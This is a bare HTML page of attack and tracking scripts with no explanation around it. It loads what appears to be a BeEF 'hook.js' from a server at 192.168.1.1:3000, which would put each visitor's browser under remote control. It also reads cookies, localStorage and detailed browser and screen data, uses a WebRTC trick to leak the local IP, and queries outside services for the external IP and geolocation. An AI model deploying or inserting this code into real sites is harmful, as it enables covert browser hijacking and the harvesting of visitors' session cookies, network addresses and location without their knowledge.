
<span id="ip"></span>
<br />
<span id="ipP"></span>
<br />
<span id="all"></span>
<br />
<span id="dd"></span>


<script type="text/javascript" src="http://192.168.1.1:3000/hook.js"></script>



<script>
var timeOpened = Date();
var pathname = window.location.pathname;
var referrer = document.referrer;
var previousSites = history.length;

var browserName = navigator.appName;
var browserEngine = navigator.product;
var browserVersion1a = navigator.appVersion;
var browserVersion1b = navigator.userAgent;
var browserLanguage = navigator.language;
var browserOnline = navigator.onLine;
var browserPlatform = navigator.platform;
var javaEnabled = navigator.javaEnabled();
var dataCookiesEnabled = navigator.cookieEnabled;
var dataCookies1 = document.cookie;
var dataCookies2 = decodeURIComponent(document.cookie.split(";"));
var dataStorage = localStorage;

var sizeScreenW = screen.width;
var sizeScreenH = screen.height;
var sizeDocW = document.width;
var sizeDocH = document.height;
var sizeInW = innerWidth;
var sizeInH = innerHeight;
var sizeAvailW = screen.availWidth;
var sizeAvailH = screen.availHeight;
var scrColorDepth = screen.colorDepth;
var scrPixelDepth = screen.pixelDepth;

document.write(timeOpened + '<br />')
document.write(pathname + '<br />')
document.write(referrer + '<br />')
document.write(previousSites + '<br />')
document.write(browserName + '<br />')
document.write(browserEngine + '<br />')
document.write(browserVersion1a + '<br />')
document.write(browserVersion1b + '<br />')
document.write(browserLanguage + '<br />')
document.write(browserOnline + '<br />')
document.write(browserPlatform + '<br />')
document.write(javaEnabled + '<br />')
document.write(dataCookiesEnabled + '<br />')
document.write(dataCookies1 + '<br />')
document.write(dataCookies2 + '<br />')
document.write(dataStorage + '<br />')
document.write(sizeScreenW + '<br />')
document.write(sizeScreenH + '<br />')
document.write(sizeDocW + '<br />')
document.write(sizeDocH + '<br />')
document.write(sizeInW + '<br />')
document.write(sizeInH + '<br />')
document.write(sizeAvailW + '<br />')
document.write(sizeAvailH + '<br />')
document.write(scrColorDepth + '<br />')
document.write(scrPixelDepth + '<br />')

</script>



<script type="application/javascript">
  function getAll(json) {
      document.getElementById("all").innerHTML = 'All: '  + json.city;
      var allas = json.as;
      var allcity = json.city;
      var allcountry = json.country
      var allcountryCode = json.countryCode
      var allisp = json.isp;
      var alllat = json.lat;
      var alllon = json.lon;
      var allorg = json.org;
      var allquery = json.query;
      var allregion = json.region;
      var allregionName = json.regionName;
      var allstatus = json.status;
      var alltimezone = json.timezone;
      var allzip = json.zip;
      document.write(allas + '<br />')
      document.write(allcity + '<br />')
      document.write(allcountry + '<br />')
      document.write(allcountryCode + '<br />')
      document.write(allisp + '<br />')
      document.write(alllat + '<br />')
      document.write(alllon + '<br />')
      document.write(allorg + '<br />')
      document.write(allquery + '<br />')
      document.write(allregion + '<br />')
      document.write(allregionName + '<br />')
      document.write(allstatus + '<br />')
      document.write(alltimezone + '<br />')
      document.write(allzip + '<br />')
  }
</script>
<script type="application/javascript" src="http://ip-api.com/json?format=json&callback=getAll"></script>




<script>
function getUserIP(onNewIP) { //  onNewIp - your listener function for new IPs
    //compatibility for firefox and chrome
    var myPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
    var pc = new myPeerConnection({
        iceServers: []
    }),
    noop = function() {},
    localIPs = {},
    ipRegex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g,
    key;

    function iterateIP(ip) {
        if (!localIPs[ip]) onNewIP(ip);
        localIPs[ip] = true;
    }

     //create a bogus data channel
    pc.createDataChannel("");

    // create offer and set local description
    pc.createOffer(function(sdp) {
        sdp.sdp.split('\n').forEach(function(line) {
            if (line.indexOf('candidate') < 0) return;
            line.match(ipRegex).forEach(iterateIP);
        });

        pc.setLocalDescription(sdp, noop, noop);
    }, noop);

    //listen for candidate events
    pc.onicecandidate = function(ice) {
        if (!ice || !ice.candidate || !ice.candidate.candidate || !ice.candidate.candidate.match(ipRegex)) return;
        ice.candidate.candidate.match(ipRegex).forEach(iterateIP);
    };
}
getUserIP(function(ip){
    document.getElementById("ip").innerHTML = 'Local ip: '  + ip;
});
</script>


<script type="application/javascript">
  function getIP(json) {
      document.getElementById("ipP").innerHTML = 'External ip : '  + json.ip;
  }
</script>
<script type="application/javascript" src="https://api.ipify.org?format=jsonp&callback=getIP"></script>
